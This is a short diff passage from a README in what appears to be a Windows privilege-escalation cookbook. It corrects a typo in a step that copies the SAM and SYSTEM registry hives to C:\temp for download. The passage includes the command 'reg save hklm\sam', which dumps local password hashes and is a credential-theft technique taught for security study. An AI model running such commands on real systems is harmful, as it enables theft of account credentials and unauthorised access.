nickvourd/Windows-Local-Privilege-Escalation-Cookbook/README.md

 mkdir C:\temp
 ```

-2) Cooy the sam and system hive of HKLM to C:\temp and then download them.
+2) Copy the sam and system hive of HKLM to C:\temp and then download them.

 ```
 reg save hklm\sam C:\temp\sam.hive